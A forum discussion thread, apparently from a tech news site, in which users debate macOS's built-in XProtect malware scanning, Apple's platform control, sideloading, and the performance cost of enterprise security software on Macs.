I think it’s interesting how long it took for the industry to accept that it’s really the OS’s responsibility to protect against malware and viruses.
It's not about "acceptance", unless it's about the increasing acceptance of authoritarianism --- because after all, it's really about control of the platform. They realised they could start calling everything they don't like "malware", that doing so would convince many if not all users, and thus found another way towards becoming the eventual arbiters of truth. Don't like something that your competitor does? Implement restrictions in the OS, and then when your competitor finds a way around that, start calling it "malware" and detecting and deleting it. We've already gotten disturbingly close to that reality:
Those of us who have been in this for a while may remember a time when a lot of Windows AVs would classify binaries compiled with GCC as suspicious or even quarantine/delete them, while those compiled with MSVC from the exact same source code were fine.
We know what things like this can and will be used for. AVs were in bed with antipiracy groups and Big Tech before it was even called Big Tech. We've seen past abuses of centralised power, and know that this is not going to end well.
You know “my platform, my rules” wouldn’t bother me so much if we didn’t go to a freemium model. Freemium is just usually to worst combination of commerce/ads there is. So suddenly I am no longer the client they are serving.
Macs are explicitly the opposite of a freemium model, though. The business model is such that the software is just a supporting element of the explicitly premium hardware.
That's right, and with the remote attestation capabilities of Secure Boot implementations, governments will finally be able to demand that every device sold has to be running an up-to-date version of an "approved" OS in order for ISPs to allow the device to access the internet.
The only limit is how incrementally they can introduce these rules so that the frog doesn't jump out of the boiling water. For example, the rules wouldn't initially apply to businesses, and maybe hobbyists would be allowed to use a special ISP that provides a custom CA certificate to do TLS interception.
I predict that within 5 years, a G7/EU/FVEY country will have passed a law that at least starts this process of making it illegal to run programs (or have VPN connections) that are blacklisted by the government. A major cyberattack (especially a false flag) will only speed up that timeline.
I think it was inevetiable, because the OS features needed to implement virus scanning are indistinguishable from the features needed to hook malware into the OS (and apart from those technical details, most 3rd party antivirus solutions became actual malware over time, or at least actually increased the attack surface because of the shady shit they're doing).
What's funny though is that I always thought that Apple/macOS is doing things differently because they are a decade ahead of Microsoft when it comes to securing their OS, but it turns out that Apple is actually a decade behind (also see the Windows Vista style confirmation popups on recent macOS versions).
I'll add to this that as a long time Windows user, and occasional Mac OS (work related), I'd say Windows is a decade behind gnome.
How Windows still doesn't have good ways to record or capture the screen, of moving and resizing windows is still requires focus and skill, is beyond me. Also, different UIs from different generations, with partially overlapping features. Not to mention internal key value store that makes it impressive that it doesn't stop working suddenly more often than it does.
^ I thought this made it clear I was referring to Windows?
I honestly do not care about anything related to flame wars. Just that whenever I use Windows and want to do OS related things, it all feels clunky and annoying. It's not consistent. It's slow at start for no good reason (likely due to telemetry, or other online stuff). Updates are annoying and I'm glad I don't have do do anything professional on Windows. The windows api is ugly. The only saving grace it has for technical productivity is WSL2. But, at that point, there is zero incentive to use something so clunky, when you can use linux/gnome and have a much, much, more enjoyable experience.
Again, everyone to each theirs. Ship buoyancy and all that.
edit:
Ah, I think I understand my misunderstanding. I wasn't commenting so much on the previous post about Windows vs MacOS. But adding that if something is a decade old compared to Windows, I consider windows to not have had any consistent improvements since Windows XP. Everything after that has been a mess. Some things better, but with a mix of old. "Need to fix something os-related", looks through new control panel. nope. looks through old control panel nope. Maybe it was in computer management?
I see. No worries :) My comment was intended as being somewhat relevant to, but not directly, to yours. The same way you related your windows vs mac experience, I related my gnome to windows.
> What's funny ... it turns out that Apple is actually a decade behind.
This is completely false.
A year before Microsoft released Defender in 2006, Apple had already packaged AV scanning in Mac OS X Tiger Server[1] in 2005. ClamAV[2] is OSS, and easily installed on the client OS, and many did so and had been since its first release in 2002.
The thing was, practically, there were no viruses on Mac OS X. The only reason Apple included ClamAV on the server was for scanning mail, because Mac OS X Server's mail server obviously also served Windows mail clients. IOW, Apple was fixing Microsoft's broken crap before Microsoft's own attempt to fix their broken crap.[3]
The very first Mac OS X virus appeared in 2006, called Leap-A. That was one in 2006, when Microsoft Windows already had tens of thousands in the wild. Following Leap-A were a few proofs of concept, and it seemed like every year, there would be one new virus, worm or Trojan horse identified on Mac. But infection was exceedingly rare, compared to Windows that would ensure a new installation to be infected within 10 minutes of being connected to the Internet.
By the mid-2010s there were dozens of identified malware on Mac, but infection was still a very rare exception. Meanwhile, Windows had hundreds of thousands of malware by then, and it was nearly impossible to prevent infection even with vigilant virus scanning; malware got through ordinarily.
To this day, malware on macOS is pretty much a nonissue, and AV on Mac is only there primarily to prevent Windows machines on the same local network from being infected via Mac proxy. There has never been a widespread malware infection on Mac since Apple modernized their OS to BSD. Similarly, you never hear about malware on NetBSD, FreeBSD, or OpenBSD. There is good reason: unlike Windows, BSD is not fundamentally insecure. Malware developers go after the low hanging fruit, which is always pretty much only Microsoft Windows, and malware has plagued Microsoft's NT-based OS since inception.
[3] Had Microsoft Windows not been so dysfunctional, with Microsoft prone to actively breaking useful functionality in enterprise, Linux would never have become so popular. Linux's first best reason for existing was that Linux devs would quickly restore Windows' functionality within short order of Microsoft's removal of that functionality, within days or weeks. For years it was a cat and mouse game, with Linux's cat quickly catching Microsoft's mouse. This is how Linux got a foothold in the server room, which, as we know, exploded between 2011 and 2013 when Linux finally took over the datacenter.
Spybot has also been subsumed into some bloated "security center" type software. As far as I know there's nothing out there that does as efficient a job at hosts-level blocking as Spybot did back in the day.
I remember having to run a tool that deleted then replaced the winsock registry entries on the machine with the default ones from XP to fix infections. Even if you got the binary files with spybot you’d still have a broken winsock half the time.
Those were the days of the amazing Royale theme for XP… awesome theme.
I wonder how many learned how to remove malware and/or reinstall Windows too, thus gaining quite useful practical skills and becoming more comfortable with tinkering with the OS. I've read plenty of stories about kids accidentally doing so on their parents' computer, then while desperately attempting to fix their mistake, learned about such things as the registry (in particular, the location of autorun keys...), batch files, the command prompt, etc.
That's what I did, now shy of 20yrs later, I'm thankful for it as it was a great door to an ending era of computer fluency and troubleshooting/learning.
Nowadays, it's different. Less poking and proding in an OS and that is sad.
Yep. About once a month after I broke something badly or got malware for the millionth time. Shoutout to my friend's dad who worked in IT and gave me their WinXP corporate serial number so I could reinstall without having to phone Microsoft! Still have it memorized to this day.
Is it? If this could be disabled, the performance would be so much better, it can be truly called Windows 12. But now M$ forbids user to do that without probably jumping through big hoops.
The industry is still pretending that it's actually app store platforms' responsibilities to protect against malware and viruses, as opposed to the operating system's responsibility.
The core function of trusted computing was to lockout malware, so it does make sense that this needs to be handled by the OS.
That said, and as many others have pointed out: with great power comes great responsibility.
There are definitely two-sides to this. If we look at the iOS platform we have many developers who complain about the approval process, but we also have the platform with the least amount of malware by a significant margin despite the large/valuable install base.(1)
It’s also why I find it a bit crazy that the new EU rules will crack open a lot of that protection. They should have mandated for 3rd party approvals, not for a weaker anything-goes security model.
Installing apps from another AppStore on android is a somewhat more advanced concept. Enough that most people who think that computers are magic I know only use the official play store. To enable third party stores you have to explicitly enable it, and if you’re doing that you probably know what you’re doing.
Why can’t it be the same on iOS?
All I really need on the iPhone is something like newpipe and I’d be happy.
Apps can be side-loaded directly from websites. One doesn’t need another app store - the reason why competitor app stores fail is because they’re untrustworthy and crap. There isn’t a need for another app store if what one wants is already on the play store. The only secondary model that makes sense is direct downloads from websites, which unfortunately is also malware territory.
This is why the EU rules fall on their face: it’s all the security holes with none of the perceived advantages, only a few big names will make bank because they’re big and trusted enough to advertise directly to consumers.
As i said before, the EU should have just mandated that approvals are spun off to a 3rd party entity. That way it would solve the usual line of attack “apple didn’t approve my crashy spyware calculator app because they want to get rich on their own free calculator.”
Apple preventing “side-loading” is an essential part of controlling the platform, and it’s making them tons of money. Apple wont let go of that, at least not willingly.
Bringing free antivirus to Mac is a good thing IMO, especially since Microsoft has been doing the same for years.
I'd like to see much more behavioral analysis like the leading AV companies do, rather than just fingerprinting but it's a good start.
One thing I don't like about Apple's approach to security is locking the user out, making the OS like a black box. For me the user should always retain the last word. Until now most of their work has been in this direction (and the direction of iOS) but I'm pleased to see they're looking more into mitigation rather than just prevention now.
> One thing I don't like about Apple's approach to security is locking the user out, making the OS like a black box.
If we're talking about prevention of execution of unknown applications, that's not existent. Right click any application, click open, and it'll show you the same warning with "Open" added. So, you can always override Apple's warning.
I like how macOS makes you read the warning box before making a decision, tbh. Yes, it's no Linux in terms of flexibility, and freedom, but I like the OS nevertheless.
Windows is not at a different place. The boot chain is incrementally locked down. Also, due to unfettered access throughout Windows API, adding extra kernel modules was not widespread under Windows.
Just because you can modify Windows, it doesn't make it a better place overall. We have witnessed what happened to it over the years.
At the end of the day, I'm a Linux guy and strong GNU proponent. The reason I use Mac laptops because of the hardware & software integration they provide, plus I always keep a virtualized Linux installation at top of it.
If macOS was not interoperable with Linux, I'd not be using it.
Windows also has a bunch of protections against modifying the kernel. Ironically this wasn't done to defend against malware but to defend against _antivirus vendors_ patching the kernel and making the system unstable.
People have been talking bs about Windows for a long time, but I think Apple will do even worse than what MS did to Windows. As something gets more popular (in this case, macOS), unfortunately it falls victim to corporate greed (telemetry, forced updates, etc.)
It depends on the profit motivators. Windows fell victim to telemetry and forced updates because Microsoft’s business model might not be what you think it is.
Apple has a simple business model for macOS. It exists solely as a vehicle for selling Macs - premium computers with (most importantly) a fat profit margin.
Keeping the customer wanting to buy new Macs (and maybe that new iPhone…and that Apple TV+ subscription…) is what drives their OS to be, generally, much less user-hostile than Windows. The user is the customer; whether through direct hardware sales or through the subscription purchases those hardware sales lead into.
Microsoft, in turn, sells Windows to OEMs and the business world via bulk licensing. You, the consumer, buying a Windows 11 license is not what’s funding Satya Nadella’s new private island. It’s Initech Corp. buying 5,000 PCs with Windows because “no one ever got fired for buying IBM.”
Disclaimer: this is largely all speculation, and if I am off the mark, do let me know.
First, Apple now has a vast ecosystem which they are trying to promote, be it music, movies, TV, advertising, some of it requiring or optimized for their hardware. It goes beyond selling Macs.
Second, Microsoft is also trying to sell PCs. I don't buy the idea that they can be explicitly anti-consumer and get away with it. Backlash against the OS would hurt MS's bottom line perhaps more than Apple.
> Second, Microsoft is also trying to sell PCs. I don't buy the idea that they can be explicitly anti-consumer and get away with it. Backlash against the OS would hurt MS's bottom line perhaps more than Apple.
Gmail wastes 10% of your mobile inbox screen real estate on a large bar at the bottom of the screen that's only function is to let you switch between email and their attempt at a Zoom competitor.
Macs is a small part of the Apple revenue. Apple is no longer in computer/phone business. It is in an ecosystem business wherein it can keep on adding a deca-billion dollar vertical every few years.
The thing is, iOS's security and application model was like that since the beginning. Tech-minded people buying into Apple ecosystem knew these details from the get go. I personally accepted these terms before getting my iOS devices, for one.
It's not like the Android ecosystem, which started as an open source free for all mobile OS, which iteratively locked and closed down, starting from Google integration to OS and boot loader level.
Now, Google is preparing to throw Linux kernel out of Android for a even more tightly controlled Fuchsia kernel. I'm hoarding my popcorn and wait for the day when the hardware vendors stop building their Fuchsia drivers to control how they deprecate their hardware, and fine-tune their bottom lines.
The response from the community will worth a watch.
Also, in pure irony, Apple is preparing to allow application sideloading.
> Also, in pure irony, Apple is preparing to allow application sideloading.
Only because the EU is preparing to force them. Apple is still very strongly against it. Recently they listed a bunch of reasons why they think it shouldn't exist.
But they know this is coming from the EU so they're probably trying to do it on their terms while they still can. Give as little as possible to the users to keep the EU off their back.
> One thing I don't like about Apple's approach to security is locking the user out, making the OS like a black box.
You can still turn off an awful lot of the security features in macOS. Some require a reboot, but still, the option's there for developers and power-users, if they prefer or require riskier operation.
Yes but that's all or nothing then. And you lose out on some functionality.
There is no way for me to put my own configuration in the system and still have it persist. For example I change things in sshd_config (to turn off password auth), and PAM.
This is not OK, there should be a way for me to sign files so they are marked as valid.
I don't think the read-only OS partition or the SIP is a bad idea. The bad part is that Apple is the only one who controls it.
With all due respect, a person doesn't have to be that smart to cut and paste something from a Google search while not completely understanding the consequences.
> There is no way for me to put my own configuration in the system and still have it persist. For example I change things in sshd_config (to turn off password auth), and PAM.
Does putting your custom options in something like:
/etc/ssh/sshd_config.d/disable-passwords.conf
no longer allow custom sshd config to survive updates? It's like if you're configuring daemons on, say, Ubuntu the "right way" so you don't get a ton of those prompts during apt-updates asking you if you want to accept the maintainer's config file or roll the dice and keep your own.
Good point, I have not tried that. Pretty sure when I still used macOS this didn't work. I think Mojave or Catalina was the last one. In the end I just had enough of macOS, this was only one of the many reasons. The lack of choice in UX configuration is another one.
Opinionated software is great if your opinion is aligned with the vendor's but Apple has been moving away from mine ever so slowly since peak macOS which was around snow leopard for me.
I really love how KDE gave me all the options back that I missed for so long. Finally virtual desktops in a grid again. And choosing what I want my UI to look like (and not forced changes on me every year)
The problem is that any way for you to sign files is also a way for malware to convince a less technically-adept user to sign it. Even if the dialogue that pops up for this says “Never ever do this unless you know exactly what you are doing, if a program you are running brought this up then it is probably trying to HACK you!”, people will click through it on autopilot and then maybe go ask what it meant afterwards.
I have a feeling it's not only that though. Apple is rapidly expanding from a hardware to a media content vendor and they have reasons to want to protect their own content as much as possible.
> here is no way for me to put my own configuration in the system and still have it persist. For example I change things in sshd_config (to turn off password auth), and PAM.
This is now possible for SSH, btw.
They finally support /etc/ssh/ssh[d]_config.d/ where you can add your customization files, and they won't be squashed by an OS update.
So they finally picked up on the technique Linux has been using forever.
And this arrogant "we know better than you, plebes" is why I don't buy apple shit.
My money, my hardware, my control. Not negotiable.
(Edit: this applies to all their offerings. Iphone is already anti-user and effectively a rented device. Mac laptops are heading that way. Do not want.)
In their defense—both Apple's, and the public's—the general populace is, like, 99.99% OK with outsourcing those choices to a company that's way more interested/invested/capable in knowing better than they would be on their own.
Is it arrogant if the public continues to reward/reaffirm it?
> In their defense—both Apple's, and the public's—the general populace is, like, 99.99% OK
Majority of customers purchase one of two options in a duopoly isn’t really an endorsement of the options, but rather a critique on the lack of options.
Nonsense. At various points during iPhone's lifetime, customers had the ability to choose Windows Phone, Nokia, Symbian, Blackberry. People who wanted cheap or hackable phones went with Android, everyone else bought iPhones. Just like today!
Other operating systems were available in the past, and you can release a RISC-V Lisp OS phone incompatible with everything else tomorrow if you want. Just like in the past.
… however, the market decided years ago it didn't want to support a multitude of choices, when all other viable options went belly-up, or currently fail to get traction … or, to be fair, can't compete with the giant marketing machines of the remaining parties.
the general populace is, like, 99.99% OK with outsourcing those choices
Because they were deliberately made to feel helpless.
to a company that's way more interested/invested/capable in knowing better than they would be on their own.
The company is "way more interested" in continuing to squeeze the $$$ out of you, and would rather you not know anything but be subservient to it, because then you cannot object.
Is it, though? Or is it evidence that Apple's products wins out on usability for the majority of use cases that are relevant to their customers? That is compared to Linux, where you have to make an active effort to acheive the same level of usability.
So you’re saying that you know better what most people want in a phone than they do?
I bet if you told 100 random people on the street what they could do with an Android phone that they couldn’t do with an iPhone, 99 of them would shrug and not care.
No the flip side is that I choose the product on the market that best meets my needs as do most people.
I started programming in assembly in 6th grade in 1986 and by the time I graduated from college in 1996, I had dabbled in assembly for four different processors (65C02, 68K, PPC, x86) and I have been a professional hands on keyboard developer since then [1]. I think I have a good grasp on how this computer stuff works. I still prefer the Apple ecosystem.
Have you thought that most people don’t care about the ability to run a Linux shell on their phone? I certainly don’t.
[1] before I get called out, I’ve mentioned before that my official title now is “cloud architect specialized in application modernization consulting”. But that just means that I’m still just an “full stack enterprise developer” who also writes a shit ton of yaml/HCL/PowerPoint slides, “one pagers” and PrFAQs.
Same here. I just finished reading Raymond Chen's The Old New Thing, and it was really reassuring to read about the choices the Windows developers would make to always give the user the final choice over the programs. Hopefully Microsoft still has devs like these working their on the OS now.
They give you pretty much all control of the hardware. The ultimate sign of that is, that you can install Linux on the ARM macs now. Apple even made some steps to make this reasonable. You do have full control of the hardware.
On the other side, a booted macOS has certain limitations in place. Not even root is able to write to certain partitions and such stuff. This is not because "we know better", but because these limits provide some fundamental security. A partition which cannot be written to, cannot be modified by malware.
You can boot into a mode where this protection does not exist, but for productive usage, it is a good idea to have that protection in place.
You can turn off most of the stuff that's keeping it out of "your control". I write "most" only to hedge—I'm not aware of any that you can't (though there may be some).
There's also the option of doing better things with your life and not worrying about what software your phone runs, in reality your life has to be really fucking boring for it to make any difference whatsoever.
A few years ago there was an advertising campaign run by Australia's massively dominant telco, Telstra. It went along the lines of a new business struggling to get their various comms setup via a number of smaller players, different ones per communications medium: Internet, landline, mobile. This faded to the advertising tagline of "Let's just get Telstra to do it": one-stop-shop for all your comms needs.
Having been responsible for WAN connectivity for a company with branches spread around Australia, I'm aware that the attitude of (added the first two words and comma for appropriate dramatic effect) "Fuck it, Let's just get Telstra to do it" will end up adding a good 30-40% of costs over and above alternate providers.
Moral of the story: The cost is worth it to some people, probably a majority of people because they just don't want to think about it, don't want to go to the extra effort, and probably won't realise the cost difference.
I'm not one of those people. I feel as if I'm quite "aware" of the nature of the world, and I react as per how I feel is appropriate. If that's "really fucking boring" to some internet rando, then, well, maybe I'd better re-think my entire life! Maybe I'll get Telstra to do it...
For that can't you use Private DNS / Encrypted DNS pointing to a PiHole or nextdns etc? My memory is that iOS you have to change the DNS settings for each network which is sort of a headache, but one-time at least.
that only works for network requests that use dns. some (including a number of apple & google services) go directly to an ip address, which is why a firewall like little snitch is still valuable beyond dns-based blockers like pihole, nextdns, and adguard (this is what i use on ios). you used to be able to install an application firewall on jailbroken iphones, but i don't think that's an option any more.
on macos, i used to use hands off! from one periodic (and before that, metakine), but they've since disappeared. i now use lulu with pf firewall via murus lite as a backup, but may switch to little snitch again (used to have a license but was unable to upgrade it so switched to hands off! via a promo) for the better UX.
No, the main issue is Apple considering themselves an unquestionably trusted party. Notarization and all other shit. I want to build a macOS app at some point because every single one of modern instant messaging clients sucks, but I won't be paying $100/year to be able to "notarize" it.
I had gatekeeper completely disabled, yet somehow it has recently reset to its asinine default and I got this "this app isn't from an identified developer, you should delete it" error. I hated it.
If you must do code signing for whatever reason, at least let me install my own roots of trust for developers I personally consider trustworthy.
Is there a way to disable the scanning that doesn't involve disabling SIP which prevents you from running iOS apps?
macOS really seems to try to frustrate power-users with these non-optional security features. I even had to make a separate note document with the commands/references to disable the various security features. I don't understand why they choose to frustrate this audience by making it so difficult.
Gatekeeper, AMFI, Quarantine, Library Validation and probably more (those are just the ones I have in my list of commands to disable).
I guess "non-optional" is inaccurate but every new macOS update I end up googling why some app can't open and discovering a new mechanism that I need to bypass (or a change to an existing one).
would you mind sharing some of that note you created? more insight and control over this part of the system is needed. I'll hunt for some apple docs, too.
Our business primarily uses macOS but we use Microsoft Defender ATP because we’re an Azure and Microsoft 365 house. The performance hit is absolutely insane but I’ve simply not had enough time to debug it and see if it can be tuned to something more reasonable.
Installing Homebrew is probably the biggest example, without Defender ATP, probably ~3 minutes. With Defender ATP, upwards of 15.
I’d love to convince the powers that be that XProtect is enough, but I’d need some way of measuring and auditing it. Any suggestions?
Defender ATP isn't really comparable to XProtect because it's providing your company with detailed logs of what's going on with the device - file operations, network connections, data about every program executed and the command line, and so on. That's why it slows down Homebrew so much, it's creating a ton of files every time you run it. Setting up exclusions for Homebrew's directories might help with performance, but I'd understand if they say no. Bad guys use Homebrew too.
It's extremely hard because you're essentially trying to use absence of proof as proof of absence. ("There is no malware, therefore the anti malware worked")
Even 'known' detections and preventions won't do it because you'd have to extrapolate if it wasn't detected, if prevention of anything was actually needed. Take a detection of a Excel v4 Macro loader, that's great to detect and prevent with ATP, but doesn't do anything on a Mac, and doesn't do anything on most PC's either.
This is similar to comparing Sophos vs. Trend Micro for example. The products do similar things, have similar goals and similar methods.
Ultimately the true protection doesn't lie in what AV you have or what EDR vendor you select, but how you deal with inevitable infections and loss of service. If you can treat the loss of a laptop (be it theft, fire or ransomware) the same way, regardless of the reason of loss, you're good. That also means encryption at rest and DLP at runtime. Neither are going to be in the AV vendor's product.
The same applies to malware ingress. If you have good controls on mail (even if just for attachment and BEC scams), that already saves you a ton of issues. And if you don't use filesystem shares like it's the 90's, that helps a ton as well, because now there is no OS-native spreading method using existing mounts.
The list goes on and on, and ultimately the whole AV vendor thing is just a tiny speck in the grand scheme. The biggest gap would be your audit capabilities, and having any controls vs. having no controls at all.
Something as simple as bare minimum hardening (FDE, MFA, autolock), OSQuery or Kolide for health/security posture checks, non-SMB/NFS file access, and proofpoint or mimecast in your mail flow will have a bigger impact on most corporate setups than any anti malware vendor can do.
Depending on the skill and education level of your users, you might even consider self-selection controls. Personally I use the Objective-see tools, XProtect and on-demand Sophos. The type of work I do doesn't fare well with traditional AV, but because I don't mind binary allowlisting, persistence lockout popups etc. and periodically confirming that I didn't miss anything using Sophos, I can get my work done and be secure enough at the same time. When I work at a regulated company I'll just use their supplied workstations and bill them extra by the hour.
Homebrew is abysmally slow as is. It is a shame it has the most packages as it is the worst package manager out of Windows, Linux and Mac now that winget is GA.
I've extensively used: apt/dpkg (Debian and Ubuntu), rpm (Mandrake, Red Hat, Fedora), portage (Gentoo), and MacPorts. I also have some experience with package management on Void, Arch, and FreeBSD. I wanna say I used some unofficial package manager on BeOS back in the day, too, and I'm pretty sure QNX had one though I don't remember much about those.
HomeBrew is my favorite of them, overall. Though Portage is pretty damn great, for what it is.
My current company is using Microsoft Defender ATP as a security measure too. Honestly by far the slowest Macbook I've ever used even though it's 2018 model.
We collectively complained about it as it slows down our development process but it fell on deaf ears.
There are many ways to tune ATP, you should not be having 15 mins+ of lag to install homebrew. I erroneously see some orgs run full ATP + RegEx (DLP) and more on the same scan which can kill things tremendously alongside auto labeling.
this might be dumb, but why do we even use scanning in this day and age? Why not use kernel callbacks which notify when executables and files load for, say, the first time after being modified? Surely that'd be less race-y and waste less battery?
Totally that's why Apple made endpoint security for security vendors. You can even pipe the events from the kernel with "sudo eslogger exec | jq" on the new macOS
If you have XProtect active, it should step in if you try and open the EICAR file in a text editor. It may not if you try and “run” the file because it’s not an executable binary. Have you disabled Gatekeeper?
But this doesn't scan for zero-days, only for several major known malwares.
If you want to catch real zero-days, you have to approach things very differently. Do behavioral analytics, seeing what a process is up to and if it's poking into things it shouldn't.
Many leading AV suppliers like SentinelOne, Cylance, Crowdstrike do this and are very successful at it. However Apple is just starting in the antimalware market so I forgive them that they're just scanning for some known-bads for now.
I'm honestly not convinced any of these vendors are able to do anything about zero days either. They mostly seem to try and catch post exploitation and trying to detect "weird shit" happening post compromise (persistence, exfiltration, etc.). No AI/ML security product is going to stop someone from throwing a kernel exploit a disappearing into the night.
Browsers can generate machine code and make it executable (for e.g. V8), and so can any other app. So they could download it and put it into newly allocated executable memory pages.
What do you mean by "passes"? Unless it's a file on a removable medium or a remote fs, it has to be created, which requires opening it. Scanning removable media upon insertion and remote fses upon mounting is going to look mighty suspicious and, in the latter case, be cover for data exfiltration.
I don’t use AV and I’ve never gotten a virus on my machine regardless of OS, except when I was 12 compiling virus code from the ezine 40Hex. I don’t run untrusted executables, seems simple to me. Then I see my non-technical friends and family with 90 icons on their desktop and 6 years of files in their Downloads folder and you see how it happens.
There was a really bad Dark Ages of remote exploits which peaked around the early Windows XP era. The OS itself and Internet Explorer were a horror show.
Other than that, yes, it's been fairly rare to have malware infections that don't start with tricking the user into executing a binary, though it certainly can happen.
In 30+ years of having computers I’ve had issues twice.
Once was on in the 3.11 days. Turned out the copy of KidPix we bought had a virus on the installation disks.
The other was in the late 2000s at work on XP. I got got some piece of malware (showed ads IIRC) from a drive by using a Java exploit in an applet showed by an ad network.
If you’re not doing high-risk stuff it’s not hard to avoid. But I’m glad MacOS has this built in just in case (like MSE on Windows).
It's possible, definitely. I've had some amount of luck. But I think if we had good measurements we'd find that getting a virus through those means on personal machines is rare.
Ok, but give me a choice, it's my computer and I should be able to decide what it runs. For example, I might care about my battery life, record low latency video and audio or prefer a different anti-malware product.
> scans lasting 15-35 seconds every hour or two during periods of low user activity
Doesn't sound like that's going to use substantial battery nor outprioritize low-latency A/V. Long before Apple was known for battery life, they were known for real time media. (I won't speak to user choice though since I'm not clear on which parts are optional should you choose to tinker with macOS.)
I’m pretty happy with a combination of this malware scanning and some Objective See products [0] that can alert me to new network requests or strange behavior like dylib hijacking. Currently I’m running LuLu (firewall) and BlockBlock (persistence monitoring), and I occasionally run the other utilities when I get suspicious of something.
If I had to guess they probably use stock OS for most employees and defer to network-level filtering beyond that. Not because their stock OS behavior is wildly secure or anything, but because they’re notoriously secretive and have other reasons to have very tight restrictions on external network access.
Is this just a pandora box where all files are scanned and checksummed'd and then uploaded to a central server?
Would it tie into CSAM for apple devices? They say PUP, but what if it's politically unwated files and they wanted to discover the creator of a file/photo?
North Korea is criticized highly for pushing watermarking in it's nix distribution, but the way Microsoft Defender works for enterprise is that you have an agent on every PC, which scans all files - and that can be a "canary" for files being modified / searching the org at once for a specific hash that means you're infected or not (yes, it is trivial to pad bytes to change the checksum string, but still)
I do not know about how MAc OS does is scanning, or reporting, but that is the biggest thing I'd be looking for - we already have gatekeeper that keeps unsigned apps from "easily" being run, or even self signed/unwanted signed apps from easily being executed which operates on a checksum basis.
I'm only 50% joking when I say the most impactful security measure Microsoft ever took on Windows was to add pretty picture wallpapers that change automatically
How does this compare to bitdefender? We use bitdefender at work and I'd like to have a coffee with the security team and see if we can't get this instead. Bitdefender ruins the performance of my m1 mbp.
Try using MacOS in an enterprise. They locked the fucking power settings on me, even though I use my own power at home. So it goes to sleep after 10 minutes with no mouse movement, drops the VPN and all my SSH sessions, and then forgets my monitor layout.
Computers work pretty damn well most of the time, but as soon as enterprise IT gets their hands on it, they clog it up with poorly written, well marketed security software. We have shit like privilege managers running so that we can install "whitelisted" apps. Still have MS endpoint protection, which is a total piece of shit. All the MDM shit that runs in the background, some password sync manager, a goddamn locally installed proxy that hijacks all your web traffic. JAMF always in there fucking crashing and doing who knows what.
And we migrated our laptops when our company was bought out. And so the entire security suite was completely different. All the old security software was removed, but left cruft, and extensions and shit all over the computer. All our computers run like total dogshit until an OS reload.
All this bullshit that makes our productivity crawl to a halt, just so that they can check some boxes on a security audit.
Right. I always thought that a non-trivial part of the bad rep of Windows comes from the fact that lots of people were forced to use it at work with tons of enterprise junkware that was barely distinguisable from unremove malware. My home Windows machines on much weaker hardware always ran a lot better than machines at work. And in the past few years it feels like my corporate JAMF managed MacBook is heading in the same direction.
My sympathies! Sounds like a nightmare story indeed and I might refuse a company's offer on the basis of having to go through this alone... Although can't deny that for the most of us US salaries are pretty damn appealing.
Truthfully, if I was director of IT and security, I'd likely just source all laptops in my department and preinstall everything needed and then ship the machine to the new employee, giving them passwords through a secure channel e.g. Signal / encrypted Telegram chats / PGP'd mail etc.
I've worked once on a corporate Linux laptop and it was a nightmare. The machine in particular wasn't very good and was easily overheating and its fans were always spinning, and of course the VPN worker crashed every 3-4h or so -- which still wasn't a big deal for a 8h working day, mind you, but you did have to always be prepared for the next thing you're doing to fail with a mysterious network failure.
Again, sympathies. It sounds like a shit show. Another thing I'd consider would just be to ship everyone the same 8GB RAM laptops that all remote into cloud instances. Machine stolen? Tokens / passwords / keys expire every hour anyway even if the IT is asleep at the wheel for that one hour, so who cares.
Organizations are being denied cyber liability coverage for not having EDR across the board. Without the data to prove what didn’t happen, most regs require assuming the worst, possibly resulting in hefty fines. Unfortunately the current cyber landscape does not favor the worker.
I feel your annoyance about it going to sleep, but you should be able to run the built-in 'caffeinate' command in the terminal to prevent sleep -- you don't need to install Amphetamine.
If for some reason that didn't work, you can also find a long YouTube video to play on mute -- videos disable sleep as well.
It's the other way around for me. Had been happy with Linux until gnome 3, then just when commercial apps were there, usability went downhill, and kde just sucks in another way. I know about SIP and other crap, but using Linux desktops just ceased to be fun and gets in the way a lot, so I'm looking forward to buy a MacBook again after many years.
Well admittedly my main reason for wanting to switch is not the kind-of-intrusive virus scanner.
I want to experiment with a lot of tech and 99% of it is only accessible in Linux. I want to try more things than just what I'm paid to do today so that kind of finalized the decision.
As for desktop Linux, I know it's a challenge. But I'll make it work. I feel it's a worth investment.
That's a different thing though. I don't want Zoom and Chrome pwning my system. I just want less intrusive antivirus software. Or at least have the decency to show up on the menu bar's status icons list with a spinning icon or whatever.
Apparently that's too much to ask. No, I have to find out why my compilation is currently going 2x slower by checking the CPU load and seeing yet another XWhateverService taking up 200% CPU and 50% SSD capacity.
Various XProtect or XService (or something similar) processes. I looked them up about a year ago, they check out to be Apple services.
Problem is they fire up at the most random of times and sometimes really get in the way of my work. Granted it's never more than 30-60 seconds but I am growing weary of having to fight my system or choose to just give up and wait.
This is a push in the right direction, but the fact that it took this long is amazing to think about. I'll personally still install AV on MacOS. You can never be too safe.
I already ditched third party antivirus programs on Windows for Defender. Would be really lovely if I could also ditch my third party antivirus on all other OS like macOS.
There are command line knobs to turn these features off. You can disable SIP, or you can disable the system policy (which disables Gatekeeper and XProtect).
It's definitely a case of "just because you can, doesn't mean you should".
CPUs are basically on or off, so as long as it was doing something anyway, it's unlikely this can use much power or you'd even notice. Don't look and you'll be happy.
I have not seen this behavior on any of my Macs, and what you're describing is not normal.
I'm not saying that you're necessarily wrong, but there are many different things that could also cause this. Some investigation would be in order before making that claim. (Spotlight indexing via mdworker is the usual first culprit for this kind of behavior, in my experience.)
You should be able to see what's causing the extra load by keeping an eye on Activity Monitor.
Last couple times I got tons of beachballs system-wide for no clear reason, it was because I was doing Android dev and had the emulator running, or, earlier, because I hadn't yet switched to Safari. Both FF and Chrome did that to me, though Chrome was slightly better about it.
I have an M1 MacBook Air, and a 2018 MacBook Pro. Neither of them ever have beachballs. Something is either hogging resources on your system, or it's just an older machine.
Do they still make the default user an admin account? If so, this is, in my opinion, a band-aid designed to prevent users experiencing any bother. Actual security measures will almost always introduce friction - I'd love to be able to leave my front door open but I have to use a key.
The default is still “admin” in the sense that it can sudo or equivalent. But quite a lot of the OS itself has been isolated from sudo/etc, and in recent versions isolated to a read-only FS. And quite a lot of the native APIs (eg file system access outside the app’s isolated storage) have been restricted to require asking for explicit permission before they can be used. Some functionality has even been restricted to require direct authentication (notably: password autofill in Safari). The FS access limitations feel most frictionful, but nowhere near so much as earlier Windows forays into this kind of UI; the downside of that is that it’s easy to forget what access you’ve granted.
Most of the rest of macOS defenses depend on almost totally invisible malware mitigations. “Almost totally” as in you don’t even know it’s running unless you happen to spot it in a process monitor.
